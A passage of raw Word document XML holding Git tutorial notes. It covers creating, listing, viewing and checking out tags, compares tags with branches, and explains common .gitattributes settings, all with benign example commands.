        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating a Tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543EB53" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>To create a lightweight tag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7B7C0" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12413079" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED3EC3" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git tag v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DB081" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>To create an annotated tag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB933C2" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F036CBA" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116EC77B" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git tag -a v1.0 -m "Release version 1.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E77E17" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listing Tags</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD3258" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>To list all tags in the repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1025B" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24333A" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE0D91" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB30D0" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Viewing a Tagged Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCA428" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>To see the details of a tagged commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F27177" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7C164" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2E708" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git show v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25DF3E" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checking Out a Tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2365A" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>To check out a specific tag (this will put you in a detached HEAD state):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BD2AA" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:lastRenderedPageBreak/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6DB7E6" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34BADC" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git checkout v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F16EA1" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DCEC3" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve"> is a reference to a specific commit, used to mark important points in the history of a Git repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61D221" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>branch</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve"> is a moving pointer that advances with each new commit, representing a line of development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6F3CE" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>Tags are static and do not change, while branches are dynamic and continue to evolve as development progresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852ED95" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="006850DE" w:rsidRDefault="002E65F9" w:rsidP="002E65F9"/>
    <w:p w14:paraId="7A9FD924" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB78DB7" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C1F704" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEF135A" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492F0C5B" w14:textId="424E976D" w:rsidR="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gitattribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18290D" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t xml:space="preserve">The .gitattributes file is used in Git to control various aspects of how files are handled within a Git repository. It allows you to </w:t>
      </w:r>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>define attributes for specific files or paths</w:t>
      </w:r>
      <w:r w:rsidRPr="0058412C">
        <w:t xml:space="preserve">, which can influence behaviors like </w:t>
      </w:r>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>text normalization, diffing, merging, and other Git operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0058412C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBC69E" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Uses of .gitattributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F6EA5" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Text Normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B48237" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>You can control how line endings are handled across different platforms (Windows, Linux, macOS) using the text attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F43C63" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD9BF3" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12149F08" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25C328" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.txt text=auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBCB9CA" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>This ensures that text files have consistent line endings across different environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56302F35" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118FE045" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Git treats files as text by default. You can specify files as binary to prevent Git from trying to diff or merge them as text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B6CA4" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A3A48D" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC67F4" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CADFF" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.png binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BD104" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>This tells Git to treat all .png files as binary, preventing text-based operations like diffing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE3938" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom Merge Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445E25D" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>You can define custom merge strategies for specific files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809D0D0" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CC342" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB9305" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943EAB4" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.lock merge=ours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FC498" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:lastRenderedPageBreak/>
        <w:t>This tells Git to always use "ours" merge strategy for .lock files, which means it will prefer the version from the current branch during a merge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75E6D1" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom Diff Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924B379" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>You can specify custom diff drivers for specific file types to improve how differences are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005F0BD" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF15CF2" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87AB65" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC728B8" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.md diff=markdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271EB65" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>This tells Git to use a custom markdown diff driver for Markdown files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37603F49" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exporting Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026892D7" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>You can specify how files should be treated during the git archive command, which is used to create an archive (like a tarball or zip) of the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D5E1E1" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284728D1" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5AD9D" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081248FA" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.md export-ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40864E07" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>This will exclude all Markdown files from the archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C26A6" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Locking Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13B2C6" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>In some workflows, you might want to lock files to prevent them from being edited by multiple people simultaneously. This is often used in scenarios where merging isn't practical, such as with large binary files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE5B87" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA1EC9" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BEF91" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
